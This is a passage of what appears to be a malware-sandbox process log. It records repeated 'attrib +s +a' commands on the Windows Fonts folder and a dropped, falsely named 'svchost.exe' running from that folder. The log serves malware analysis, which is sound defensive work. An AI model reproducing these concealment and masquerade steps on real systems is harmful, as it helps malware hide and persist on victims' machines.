attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:4764

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1620

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4976

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3784

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1452

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:32

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2248

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:5088

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1856

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:776

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4488

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4352

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4912

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4896

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:4164

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4140

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4464

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:460

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:924

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1052

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4396

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:780

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3832

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4980

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2836

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4564

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:5012

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2624

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:940

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2284

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:5044

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1860

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4500

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4736

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:224

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4344

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:4568

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2896

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4804

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2020

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2128

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2776

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1896

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4772

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4764

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4008

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4328

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3768

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:4868

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4952

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2248

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4016

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2500

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3132

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4296

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3928

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1108

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1220

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:384

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:420

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:5084

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2340

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3520

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4960

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:460

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4148

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:4680

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3512

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4744

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3268

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:3508

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3744

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4056

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4236

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4320

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2332

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:704

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2536

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3440

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4116

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4176

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:860

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4660

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1544

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2924

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:244

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3276

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4188

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2916

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4928

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2668

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4900

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:3272

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4652

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2840

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4100

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2248

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3208

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:3428

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3728

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1528

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3132

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1644

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1636

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1184

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2660

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:4216

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4760

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4140

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:176

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:548

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1912

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4556

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3748

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:780

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2136

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1984

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4692

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:3676

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3672

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1976

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2316

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:744

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1736

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2332

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4080

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1364

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2712

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4596

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3684

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2932

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4284

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2936

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4496

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:4356

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2128

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2264

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2744

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2668

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2424

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1352

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4328

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2232

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2840

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:4892

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3160

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:3808

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3984

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4952

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3188

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:3936

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:776

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:4484

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4416

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4360

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4392

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:3704

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2200

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1636

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4516

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4352

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2724

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:420

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4280

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2340

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4464

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:3880

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1968

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:916

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1816

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:4396

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2348

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:3812

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1984

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:3832

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1844

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3892

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2952

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:3536

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1304

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:3896

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4108

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2860

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3860

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1860

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1952

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1884

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2712

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4956

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4116

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:860

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4560

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2020

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4740

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:4536

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3092

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:520

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3336

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:3524

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4684

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4900

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4328

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4008

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2500

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3548

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2104

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2380

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3728

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2720

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1496

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:776

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1332

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:556

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:328

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3840

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3388

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:960

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1140

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1520

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1220

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1144

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3468

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:3416

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4404

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4088

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1328

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:4960

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3060

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2488

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1740

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:3812

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4844

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:3848

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4996

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3676

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:640

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1976

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2472

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:940

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:744

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4108

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4688

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3860

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1364

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1952

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4724

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2712

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1204

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:4116

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2896

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:4560

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe
1⤵
- Executes dropped EXE
PID:4128

\??\c:\windows\Fonts\rundlls.exe
